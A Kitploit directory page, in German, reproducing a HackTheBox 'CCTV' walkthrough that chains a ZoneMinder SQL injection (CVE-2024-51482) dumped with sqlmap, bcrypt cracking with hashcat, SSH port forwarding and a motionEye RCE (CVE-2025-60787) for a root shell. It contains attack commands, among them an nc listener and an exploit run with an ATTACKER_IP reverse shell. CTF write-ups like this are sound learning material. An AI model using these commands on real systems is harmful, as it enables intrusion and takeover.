Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cctv — HackTheBox CCTV Walkthrough, der CVE-2024-51482 ZoneMinder SQL-Injection, bcrypt-Hash-Cracking und CVE-2025-60787 motionEye RCE verkettet, um Root zu erlangen. | Kitploit
Tools/GitHubGitHub/ledksv/cctv
Passwort-CrackingPrivilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHubledksv/cctv

cctv

HackTheBox CCTV Walkthrough, der CVE-2024-51482 ZoneMinder SQL-Injection, bcrypt-Hash-Cracking und CVE-2025-60787 motionEye RCE verkettet, um Root zu erlangen.

vor 10h 49mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CCTV — HackTheBox Walkthrough

Plattform: HackTheBox | OS: Linux

Angriffskette

ZoneMinder SQL-Injection über CVE-2024-51482 gibt einen bcrypt-Hash aus der Datenbank aus. Das Knacken mit hashcat ermöglicht SSH-Zugriff. Eine interne motionEye-Instanz, die über Portweiterleitung exponiert ist, ist anfällig für CVE-2025-60787 — liefert eine Root-Shell.

Enumeration

root@kitploit:~
nmap -sV -sC 10.129.53.160 -Pn

22/tcp open  ssh     OpenSSH 9.6p1 (Ubuntu)
80/tcp open  http    Apache 2.4.58 — SecureVision CCTV & Security Solutions

cctv.htb zu /etc/hosts hinzugefügt. Port 80 hostete eine ZoneMinder-Installation.

CVE-2024-51482 — ZoneMinder SQL-Injection

CVE-2024-51482 ist eine SQL-Injection-Schwachstelle im Login-Endpunkt von ZoneMinder. Der username-Parameter ist nicht bereinigt, was eine Datenbankextraktion ermöglicht.

root@kitploit:~
sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

Ein bcrypt-Passwort-Hash wurde aus der users-Tabelle extrahiert.

Hash-Knacken

root@kitploit:~
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

Passwort geknackt.

SSH-Foothold

root@kitploit:~
ssh <user>@10.129.53.160

User-Flag abgerufen. Nach internen Diensten gesucht.

root@kitploit:~
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel

Port weitergeleitet.

root@kitploit:~
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

CVE-2025-60787 — motionEye RCE

CVE-2025-60787 ist eine authentifizierte RCE in motionEye. Mit Zugriff auf das interne Panel werden beliebige Befehle als root ausgeführt.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444

Root-Shell erhalten. Root-Flag unter /root/root.txt.


Nur für Bildungszwecke. Testen Sie nur Systeme, die Ihnen gehören oder für die Sie ausdrückliche Genehmigung zum Testen haben.

Tool herunterladen